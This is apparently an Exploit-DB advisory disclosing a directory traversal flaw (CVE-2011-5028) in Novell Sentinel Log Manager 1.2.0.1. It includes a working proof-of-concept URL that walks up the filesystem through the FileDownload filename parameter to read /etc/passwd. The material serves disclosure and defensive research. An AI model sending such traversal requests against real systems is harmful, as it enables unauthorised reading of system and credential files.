novell sentinel log manager 1.2.0.1 - Directory Traversal

EDB-ID:

21082




Platform:

Multiple

Date:

2011-12-18


# Exploit Title: Novell Sentinel Log Manager directory traversal
# Date: 2011-12-18
# Exploit Author: Andrea Fabrizi
# Vendor Homepage: http://www.novell.com/
# Version: <= 1.2.0.1
# Tested on: Sentinel Log Manager Appliance 1.2.0.1
# CVE: 2011-5028

The latest version of Sentinel Log Manager is prone to a Directory
Traversal, which makes it possible, for Authenticated Users, to access
any system file.

Testing environment: Sentinel Log Manager Appliance 1.2.0.1

Vulnerable URL:
/novelllogmanager/FileDownload?filename=/opt/novell/sentinel_log_mgr/3rdparty/tomcat/temp/../../../../../../etc/passwd

BID: https://www.securityfocus.com/bid/51104/info
CVE-2011-5028: http://www.cvedetails.com/cve/CVE-2011-5028